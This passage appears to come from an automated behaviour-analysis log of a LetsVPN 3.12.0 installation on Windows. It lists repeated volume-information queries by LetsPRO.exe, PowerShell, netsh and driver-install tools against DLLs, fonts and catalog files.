              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeQueries volume information: C:\Program Files (x86)\letsvpn\driver\tap0901.cat VolumeInformation
              Source: C:\Windows\System32\drvinst.exeQueries volume information: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\tap0901.cat VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.RuntimeInformation.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Memory.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.Unsafe.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Crashes.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\WebSocket4Net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.Clientuser.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Http.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
